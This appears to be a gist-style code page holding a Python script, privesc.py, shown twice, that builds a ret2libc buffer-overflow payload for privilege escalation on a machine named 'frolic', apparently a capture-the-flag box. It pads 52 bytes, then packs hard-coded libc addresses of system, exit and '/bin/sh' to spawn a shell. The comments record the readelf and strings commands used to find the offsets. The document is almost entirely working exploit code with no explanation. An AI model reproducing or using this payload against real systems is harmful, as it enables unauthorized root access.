ibLeDy · December 9, 2023 19:19
diff --git a/privesc.py b/privesc.py
 #!/usr/bin/python
 from struct import pack

 offset = 52
 junk = "A" * offset

 base_libc = 0xb7e19000

 # www-data@frolic:/tmp$ readelf -s /lib/i386-linux-gnu/libc.so.6 | grep -E "\ssystem|\sexit"
 #    141: 0002e9d0    31 FUNC    GLOBAL DEFAULT   13 exit@@GLIBC_2.0
 #   1457: 0003ada0    55 FUNC    WEAK   DEFAULT   13 system@@GLIBC_2.0

 system_addr_offset = 0x0003ada0
 exit_addr_offset = 0x0002e9d0

 # www-data@frolic:/tmp$ strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep "/bin/sh"
 # 15ba0b /bin/sh

 bin_sh_addr_offset = 0x0015ba0b

 system_addr = pack("<I", base_libc + system_addr_offset)
 exit_addr = pack("<I", base_libc + exit_addr_offset)
 bin_sh_addr = pack("<I", base_libc + bin_sh_addr_offset)

 payload = junk.encode() + system_addr + exit_addr + bin_sh_addr

 print(payload)
	#!/usr/bin/python
	from struct import pack

	offset = 52
	junk = "A" * offset

	base_libc = 0xb7e19000

	# www-data@frolic:/tmp$ readelf -s /lib/i386-linux-gnu/libc.so.6 \| grep -E "\ssystem\|\sexit"
	# 141: 0002e9d0 31 FUNC GLOBAL DEFAULT 13 exit@@GLIBC_2.0
	# 1457: 0003ada0 55 FUNC WEAK DEFAULT 13 system@@GLIBC_2.0

	system_addr_offset = 0x0003ada0
	exit_addr_offset = 0x0002e9d0

	# www-data@frolic:/tmp$ strings -a -t x /lib/i386-linux-gnu/libc.so.6 \| grep "/bin/sh"
	# 15ba0b /bin/sh

	bin_sh_addr_offset = 0x0015ba0b

	system_addr = pack("<I", base_libc + system_addr_offset)
	exit_addr = pack("<I", base_libc + exit_addr_offset)
	bin_sh_addr = pack("<I", base_libc + bin_sh_addr_offset)

	payload = junk.encode() + system_addr + exit_addr + bin_sh_addr

	print(payload)